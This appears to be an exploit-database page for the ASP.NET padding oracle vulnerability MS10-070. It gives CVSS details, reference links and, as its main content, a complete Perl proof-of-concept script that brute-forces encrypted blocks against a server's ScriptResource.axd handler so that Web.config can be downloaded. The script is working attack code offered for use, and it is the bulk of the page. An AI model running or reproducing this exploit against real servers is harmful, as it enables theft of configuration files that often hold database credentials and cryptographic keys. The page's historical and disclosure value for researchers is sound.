ASP.NET Padding Oracle Vulnerability (MS10-070)

2010.10.07
Credit: Giorgio Fedon
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-310


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html #!/usr/bin/perl # # # Webconfig Bruter - exploit tool for downloading Web.config # # FOr use this script you need Pudbuster. # Padbuster is a great tool and Brian Holyfield deserve all the credits. # Download Padbuster: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) # use LWP::UserAgent; use strict; use Getopt::Std; use MIME::Base64; use URI::Escape; use Getopt::Long; #Definition of vars for .NET my $toEncodeDecode; my $b64Encoded; my $string; my $returnVal; my $testUrl; my $testBytes; my $sampleBytes; my $testUrl = @ARGV[0]."\?d\="; my $sampleBytes = @ARGV[1]; my $blockSize = @ARGV[2]; if ($#ARGV < 2) { die " Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to use. This need to come from Padbuster. BlockSize = The block size being used by the algorithm (8 or 16) Poc code by giorgio.fedon\@mindedsecurity.com Original Padbuster code from Brian Holyfield - Gotham Digital Science Command Example: ./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16 ";} my $method = "GET"; $sampleBytes = encoder($sampleBytes, 1); my $testBytes = "\x00" x $blockSize; my $counter = 0; # Use random bytes my @nums = (0..255); my $status = 1; while ($status) { # Fuzz the test bytes for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)])); } # Combine the test bytes and the sample my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0); chomp($combinedTestBytes); $combinedTestBytes =~ s/\%0A//g; # Ok, now make the request my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes); if ($status == "200") { # Remove this for "T" exploit if (index($content,"parent\.Sys\.Application") == -1) { print $content."\n\n"; print "Total Requests:".$counter."\n\n"; print "Resulting Exploit Block:".$combinedTestBytes."\n\n"; last; } } $counter++; } # The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science # # I also did the encoder / decoder, but your logic is definitely better sub encoder { my ($toEncodeDecode, $oper) = @_; # UrlDecoder Encoder if ($oper == 1) { $toEncodeDecode =~ s/\-/\+/g; $toEncodeDecode =~ s/\_/\//g; my $count = chop($toEncodeDecode); $toEncodeDecode = $toEncodeDecode.("=" x int($count)); $returnVal = decode_base64($toEncodeDecode); } else { $b64Encoded = encode_base64($toEncodeDecode); $b64Encoded =~ s/(\r|\n)//g; $b64Encoded =~ s/\+/\-/g; $b64Encoded =~ s/\//\_/g; my $count = $b64Encoded =~ s/\=//g; ($count eq "") ? ($count = 0) : ""; $returnVal = $b64Encoded.$count; } return $returnVal; } sub makeRequest { my ($method, $url) = @_; my ($lwp, $status, $content, $req, $location, $contentLength); # Setup LWP UserAgent $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], ); $req = new HTTP::Request $method => $url; my $response = $lwp->request($req); # Extract the required attributes from the response $status = substr($response->status_line, 0, 3); $content = $response->content; #print $content; $location = $response->header("Location"); if ($location eq "") { $location = "N/A"; } $contentLength = $response->header("Content-Length"); return ($status, $content, $location, $contentLength); }

References:

http://xforce.iss.net/xforce/xfdb/61898
http://www.vupen.com/english/advisories/2010/2429
http://www.troyhunt.com/2010/09/fear-uncertainty-and-and-padding-oracle.html
http://www.theinquirer.net/inquirer/news/1732956/security-researchers-destroy-microsoft-aspnet-security
http://www.securityfocus.com/bid/43316
http://www.microsoft.com/technet/security/Bulletin/MS10-070.mspx
http://www.microsoft.com/technet/security/advisory/2416728.mspx
http://www.ekoparty.org/juliano-rizzo-2010.php
http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryId/2799/Oracle-Padding-Vulnerability-in-ASP-NET.aspx
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
http://twitter.com/thaidn/statuses/24832350146
http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
http://securitytracker.com/id?1024459
http://secunia.com/advisories/41409
http://pentonizer.com/general-programming/aspnet-poet-vulnerability-what-else-can-i-do/
http://isc.sans.edu/diary.html?storyid=9568
http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top